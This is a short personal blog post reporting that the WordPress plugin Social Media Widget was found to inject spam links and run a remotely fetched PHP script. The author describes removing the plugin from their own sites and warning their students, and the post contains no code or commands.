Today I learned that one of my favorite plugins, Social Media Widget, is infected with malware. When this happens, a plugin will inject advertising spam into a website.
If someone clicks on your Facebook icon, for instance, they will open a page for Pay Day Loan.
According to a post on the site, h-online.com/, researchers at Sucuri believe the malicious code was added at the end of March when the developers released version 4.0 to the WordPress.org plugin repository.
“The plugin, which changed maintainers in January, had already been noticed behaving oddly a month ago, but the malware in version 4.0 was more obvious, reading and executing a PHP script from a third-party site; the spam injection code was even tidied upto make it more compact. A 4.0.1 version of the plugin then appeared without the malware code, but the WordPress.org maintainers were having none of it – they said that they had removed the widget from the repository and pushed an update to users of the widget to remove it from their systems.”
As a long time user of Social Media Widget, I immediately dove into my wine site, Tasting Room Confidential to see if that was one of the plugins I updated the other day. Indeed it was, so I quickly deactivated and deleted it.
I thought I was cool on my other sites, including this one, that still have v. 3.3 installed, but no. According to the comments of the Sucuri blog, previous versions are infected as well, so I deleted, deleted, and deleted again. Goodbye Social Media Widget.
It’s too bad because this is a cute little plugin with an easy interface and lots of options. I have recommended it to all of my WordPress students and must now advice them to delete Social Media Widget v.4.0 from their sites – now!
I imagine 900,000 users are doing the same right now.